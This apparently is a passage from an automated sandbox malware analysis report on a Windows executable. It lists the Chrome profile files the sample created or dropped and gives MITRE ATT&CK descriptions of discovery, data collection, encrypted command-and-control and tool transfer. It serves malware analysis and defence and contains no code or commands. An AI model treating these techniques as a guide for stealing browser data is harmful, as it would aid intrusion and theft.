Malware Analysis System Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Affiliation Database

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BrowsingTopicsSiteData

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BrowsingTopicsState

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\DIPS

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Cookies

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\000003.log

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\CURRENT

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\LOG

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\MANIFEST-000001

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\000003.log

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\CURRENT

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\LOG

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\MANIFEST-000001

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\CURRENT

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\LOG

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\LOG.old

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\MANIFEST-000001

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Google Profile.ico

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\History

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb\000003.log

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb\CURRENT

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb\LOG

Windows Analysis Report
5EvHHcMjRg.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre